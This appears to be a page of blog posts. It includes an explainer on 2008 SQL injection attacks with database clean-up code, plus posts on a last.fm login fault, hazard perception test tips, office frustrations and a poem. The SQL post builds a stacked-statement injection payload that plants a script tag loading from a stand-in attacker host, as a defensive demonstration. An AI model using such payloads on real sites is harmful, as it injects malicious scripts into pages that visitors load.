Microsoft issues advice on SQL injection attacks

Microsoft is alerting customers to several tools that could help harden Web applications, in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

This includes the uc8010 attack, which was launched around 28 December 2007 (see here and here for the lowdown on uc8010).

For the record, the attack is about poor programming (or lazy programming at any rate), and Microsoft are keen to point out that:

Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.

Microsoft Security Advisory (954462) Rise in SQL Injection Attacks Exploiting Unverified User Data Input

For those of you who have recently been hit by an SQL injection attack, here are some useful resources that I have found:

What to do if you do not have a backed-up copy of your database from before the SQL injection attack

hackademix.net has code which *may* reverse the SQL injection attack

This is the crucial piece of code which could save your bacon:

-- @T and @C hold the table and column names supplied by the cursor in the
-- surrounding hackademix.net script. For each row whose value ends in </script>,
-- this removes the LAST '<script ... </script>' block: patindex on the reversed
-- string locates the final '<script', and left() keeps everything before it.
EXEC(
'
update ['+@T+'] set ['+@C+'] = left(
    convert(varchar(8000), ['+@C+']),
    len(convert(varchar(8000), ['+@C+'])) - 6 -
    patindex(''%tpircs<%'',
             reverse(convert(varchar(8000), ['+@C+']))))
 where ['+@C+'] like ''%<script%</script>''
'
);
More than likely you will have to modify it for your specific attack; check hackademix.net for full details. Two caveats you can read straight off the query: it only touches values that end in </script>, so an injected block that is not the last thing in the column is left alone, and it converts every value to varchar(8000), so anything longer than 8000 characters is truncated when it is written back. Take a backup before you run it.
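The advisory's point above (bind user input as a parameter instead of building SQL text from it) and the hackademix.net clean-up logic, as one added example; this is not code from the article, from Microsoft or from hackademix.net. It uses Python's sqlite3 module as a stand-in for the ASP/SQL Server stack: the vulnerable path runs the string through executescript to reproduce the stacked-statement behaviour the attack depended on, while the safe path binds the same input as a value. The table, rows, payload and attacker.example host are constructed for the example, and the real injected URL is not reproduced. The clean-up mirrors the T-SQL's "last <script" trick but loops, so a column hit more than once is cleaned in a single pass.

```python
import sqlite3

# Constructed payload: a stacked UPDATE that appends a script tag to every row,
# the shape of the 2008 mass-injection attacks. The host is a placeholder.
ATTACK_JS = '<script src="http://attacker.example/0.js"></script>'
PAYLOAD = "1; UPDATE products SET description = description || '" + ATTACK_JS + "'"


def make_db():
    """In-memory stand-in for the site's database, seeded with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("widget", "A small widget"), ("gadget", "A larger gadget")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, product_id):
    """The flawed pattern the advisory warns about: untrusted input pasted into
    the SQL text. executescript runs every statement in the string, the way the
    classic ASP/ADO code path did, so a stacked UPDATE in the input runs too."""
    conn.executescript("SELECT name FROM products WHERE id = " + product_id)


def safe_lookup(conn, product_id):
    """Parameterised version: the input is bound as a value and never parsed as
    SQL. A non-numeric string simply matches no row."""
    return conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchall()


def count_infected(conn):
    """Rows matching the same LIKE pattern the T-SQL clean-up uses."""
    return conn.execute(
        "SELECT COUNT(*) FROM products WHERE description LIKE '%<script%</script>'"
    ).fetchone()[0]


def strip_trailing_script(value):
    """Same idea as the hackademix.net T-SQL: cut from the LAST '<script' when
    the value ends in '</script>'. Unlike the one-shot T-SQL this loops, so a
    column hit by the attack more than once is cleaned in one pass. Matching is
    case-insensitive, as it is under SQL Server's default collation."""
    if value is None:
        return value
    while value.lower().endswith("</script>"):
        start = value.lower().rfind("<script")
        if start == -1:
            break
        value = value[:start]
    return value


def clean_table(conn, table, column):
    """Apply strip_trailing_script to every matching row of table.column.
    Table and column names come from the schema (the T-SQL's @T/@C), not from
    users, which is why they are interpolated; the value is always bound."""
    rows = conn.execute(
        f"SELECT rowid, [{column}] FROM [{table}] WHERE [{column}] LIKE '%<script%</script>'"
    ).fetchall()
    for rowid, val in rows:
        conn.execute(
            f"UPDATE [{table}] SET [{column}] = ? WHERE rowid = ?",
            (strip_trailing_script(val), rowid),
        )
    conn.commit()
    return len(rows)


if __name__ == "__main__":
    db = make_db()
    vulnerable_lookup(db, PAYLOAD)
    print("infected rows after vulnerable lookup:", count_infected(db))  # 2
    safe_lookup(db, PAYLOAD)
    print("infected rows after safe lookup (unchanged):", count_infected(db))  # 2
    print("rows cleaned:", clean_table(db, "products", "description"))  # 2
    print("infected rows after clean-up:", count_infected(db))  # 0
```

The safe path is the whole fix: with the value bound, the payload is compared against the id column as a string, matches nothing, and the table is untouched. The clean-up is what you run afterwards on a site that was already hit; note that, like the T-SQL, it only finds values whose injected block sits at the very end.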

Cannot log in to last.fm

Am I the only person in the world that cannot log in to last.fm?

I know my username and password are okay, because under some circumstances I authenticate ok. Their forums don’t mention it. So is it just me? If you have the same problem, please let me know.

(When I enter my login name and password and hit “come on in”, I get dumped to https://www.last.fm/login)

Phah maybe it will be okay tomorrow. I’m using Firefox 3.0.1. They upgraded the site recently, but I can’t believe they broke the login??

How to pass the Hazard Perception Theory Test

I failed this thing the first time I had a crack at it. It is an utterly stupid idea, because it bears no resemblance to driving (or anything else for that matter).

I think the biggest reason why people fail is not because the test itself is stupid. People fail:

  • because they fail to understand the poor (unclear) instructions given
  • because they have misconceptions about what the test is trying to achieve and
  • because they make incorrect assumptions about how the test works.

Traditionally I would rant and rave about how stupid the test is, about its shortcomings and uselessness, but rather than waste all my energy, here is a better idea. I’ll help you to pass the bloody test. Here is what I did, I think anyone else who was worried about it would pass too if they followed the recipe below.

It’s a game. Learn their rules and you should pass pretty easily.

I passed it today, and got a pretty decent 64/75.

How did I prepare?

I bought The Official DSA Guide to Hazard Perception DVD. I also actually watched the whole bloody DVD, and practised the test until I regularly scored 5/5. It took < 1 hour.

Buy the DVD it is worth the £10 quid. You can always flog it back on Amazon.


There were other KEY bits of information I armed myself with:

Part A: How not to fail

Question
The roadsense video says you have to identify ‘developing hazards’ but you would not lose points for identifying non-developing hazards, however I clicked once on every ‘developing hazard’ and once on every non-developing hazard on my test and I failed. Why is that?

Answer
We have been told by the DSA that pressing the mouse button too much will result in you getting no score. This is resulting in a lot of people just clicking once on each hazard. Each scoreable hazard has a marking window and a score is awarded when you respond in that window. The earlier the developing hazard is identified and a response is made the higher the score. You won’t score any points if you respond outside the window and you could lose all the points already gained on the video clip.

We have been getting reports that the hazard window opens not when the hazard is first viewed but a few seconds after. This is resulting in many candidates not scoring because they are clicking just once (when the hazard is showing but the marking window is not opened.)

If you click a few times during each hazard you are likely to score, which will result in a pass. We already know of candidates who have failed the hazard test because they have just clicked once on each hazard. It would appear you have a better chance of passing if the mouse is clicked a few times when you see a developing hazard. BUT STOP CLICKING when the hazard has passed. (You only lose points responding outside the window.)

my note
I certainly clicked between 10-15 times for each video during today’s test, and that seemed to work pretty well. I did f*** up on the last question and scored a big fat zero. So do be careful!!!!

You do need to be careful though. Because if you make lots of unnecessary responses in a very short space of time, or throughout the clip, you will score 0 for that clip. If this happens you will see a warning message on screen at the end of the clip.

my note
The one criticism I would make of the Official DVD is that it NEVER failed me. I deliberately over-clicked the damned thing, but it never said that I had overdone it. I think they want (need) to keep that part of the test a secret, or the test would become very formulaic.

Nicked from http://www.2pass.co.uk/faqhazard.htm#twelve

Part B: About the Hazard Perception Test

Introduction

This part of the theory test requires you to view 14 hazard video clips on the computer screen of approximately one minute each. You are required to watch these clips as if you were the driver. There will be 15 hazards to find – at least one on each clip. However, one clip will have 2 hazards. The hazard clips will not contain any sound – just like the old silent movies.

You click either the left or right mouse button whenever you think you can see a hazard developing. The speed at which you click the mouse button as a hazard develops will determine your score for that particular hazard clip. You can score between 0 and 5 on each hazard. Therefore the maximum you can score is 75 (i.e. 15 hazards x 5). To pass you need a score of 44.

The examination process

The hazard perception part of the theory test will start with a short video tutorial played on the computer screen that will explain how the hazard perception test works and what you are required to do. At the end of this clip you have the option to go onto the test or play the tutorial again.

Each hazard clip will start with a freeze frame of the start of the video sequence and a count down from 10 will commence. At the end of the count down the clip will start to play and you will be required to click the mouse button each time you see a developing hazard.

Hazard Perception Clip

To let you know that the program has registered your click a red flag will appear on a grey band across the bottom of the screen – one flag for each click you make in any particular clip. At the end of the clip all the flags will be removed before you start the next clip.

Although each clip contains several potential hazards only the one that materialises into a real hazard and involves other road users is marked. This is known as a “developing hazard”. Therefore you will only receive a score if you spot a hazard before it fully materialises and is brought about by the action of another road user. You will know if the hazard materialises because the driver will have to take evasive action (e.g. slow down, stop or swerve out of the way).

How to score

The score you obtain will be dependent upon how quickly you spot the developing hazard. The time from when the developing hazard could be potentially seen on the screen to when the vehicle arrives at the hazard is the time frame or window used to determine your score.

Timeline

This window of time is divided into 5 equal segments. If you click the mouse while in the first segment (i.e. just as the developing hazard appears) you will obtain the maximum score of 5 points. If you click in the second segment of this window of time you will score 4 points, then 3, then 2 and then in the last segment just 1. This is accurate to one twenty fifth of a second.

If you click several times during this window of time the computer will always take your highest score and record that for that particular clip. If you don’t click the mouse button in this window of time you will score nothing in respect to that hazard.

If you try to cheat the system by clicking the button repeatedly throughout the video clip the computer program will pick this up. It does this by analysing the number of clicks over the clip as a whole and the pattern of clicks. There is a certain maximum number of permitted clicks for any clip and this is believed to be around 20.

The anti-cheat will potentially be activated if you click rapidly in a burst of 3 or more clicks or if you click in a pattern. If the computer program determines that you may be cheating a message window will appear at the end of the clip letting you know that an irregular clicking activity was detected and that as a result the score for that clip will be zero.

When the clip ends the screen will turn black for a few seconds before the freeze frame for the next video clip appears and the count down commences again, warning you to get ready. This pattern is repeated until all 14 video clips have been shown.

At the end of the hazard perception part of the theory test you will be given the option to complete a customer care survey if you so wish.

You will then be directed to leave the room and collect your score for the two parts of the exam. The maximum score that can be obtained for the hazard perception part of the theory test is 75 (i.e. 15×5). To pass the hazard perception part of the car, moped and motorcycle theory test you must obtain a score of 44. To pass the theory test you must pass both parts. If you fail either part you are required to take both parts of the test again.

Hints and tips

When watching the video clips do not be frightened to click the mouse button whenever you see a potential hazard involving another road user (i.e. anything that you think may cause the driver to change speed, position or direction). Watch the hazard and if it continues to materialise continue to click the mouse button each time the situation changes. This is the advice given by the hazard perception test introduction video played before you start the actual test. By doing this you will ensure that you click within the scoring window.

Some of these potential hazards will not materialise and therefore you will not receive a score for spotting them. For example, if the cyclist shown in the developing hazard sequence on the previous illustration stopped at the end of the side road (i.e. at the 4 point stage) the hazard would not have materialised. In the actual clip the cyclist was travelling too fast to stop. This was the real clue to what was going to happen next.

In a few instances it is difficult to determine when a potential hazard becomes a developing hazard and therefore when the scoring window should start. This is why it is safer to click a few times as you see the hazard develop to make sure you don’t click too early and miss the opening of this window. However, don’t click in a pattern; only click in response to actual changes and avoid a rapid burst of clicks.

Hazard Perception Test Clip

In the example above (supplied by the DSA) you will notice a very young child riding a bike on the pavement. This alone may be classified as a potential hazard, particularly as the child is unsupervised.

However, the scoring window on this clip doesn’t open until the child starts to turn towards the road to cross it as shown below and highlighted by the red circle. This is the point at which the potential hazard becomes a developing hazard and the scoring window opens.

Hazard Perception Test Clip 2

Therefore if you had only clicked your mouse button once as you saw the child riding her bike along the pavement you would have scored zero. Therefore, remember to click the button a couple of times as the hazard develops to avoid this problem. More advice about this and how to deal with each hazard type can be found in the next section.

Nicked from http://www.theorytestadvice.co.uk/thetests/abouthpt.htm

Part C: Types of Hazards

my note
In other words, when you see one of these, it is almost definitely going to be your HAZARD. Be warned.

  1. Zebra crossings & traffic controllers
  2. Pedestrians: Children & young adults
  3. Pedestrians: Elderly & infirm
  4. Pedestrians: Adults
  5. Cyclists & motorcyclists
  6. Horse riders & other animals
  7. Vehicles: moving off or pulling up
  8. Vehicles: meeting
  9. Vehicles: emerging
  10. Vehicles: turning left or right
  11. Vehicles: reversing & U-turns
  12. Vehicles: larger Vehicles
  13. Vehicles: flashing lights

Get more details from: http://www.theorytestadvice.co.uk/thetests/hptypes.htm

Part D: Watch this video

I watched this YouTube video: How to pass the Hazard Perception part of the Theory Test.

Buy the DVD!!!


Don’t ask

Much ado about nothing. No, really.

Before I give myself an ulcer, I decided to stop getting hyper about (seemingly) unimportant things.

Problem: There is never anything good on TV.

Synopsis: That’s a fact, and that is probably the #1 reason why I don’t watch as much TV as I’d like to. Given half a chance, I’d happily watch Judge Judy and Jerry Springer for hours on end, though I’d rather be watching Justice League cartoons, or Star Trek re-runs. Of course a lesser blogger would turn this idea into a 14,000 word essay on the demise of western civilisation. Or maybe global warming. But I got a better idea.

Solution: Don’t rely on TV.


Problem: You can become a project manager

Synopsis: this is an affront to intelligent people everywhere. I’m not saying that one doesn’t need to plan and prepare. I’m just saying that if you call it project management, then you are a loser. My boss recently employed someone because they “practise project management principles” and told me I could get some tips from him.

It took every ounce of my rather feeble will power not to go to my local hardware store, and return with a garden spade and smack every last ounce of life from her body.

I digress.

Solution: keep a garden spade in the office.

no one ever taught me how
to watch a television
like a baby i knew my candy
no one ever caught me
when i learned to ride a bicycle
and like the pavement embraced my skin
no one ever warned me
about that television
now i’m brain-dead at twenty seven
no one ever mended my
lumps and bruises
and now it’s hard to breathe
with a broken nose

wheat in no one ever told me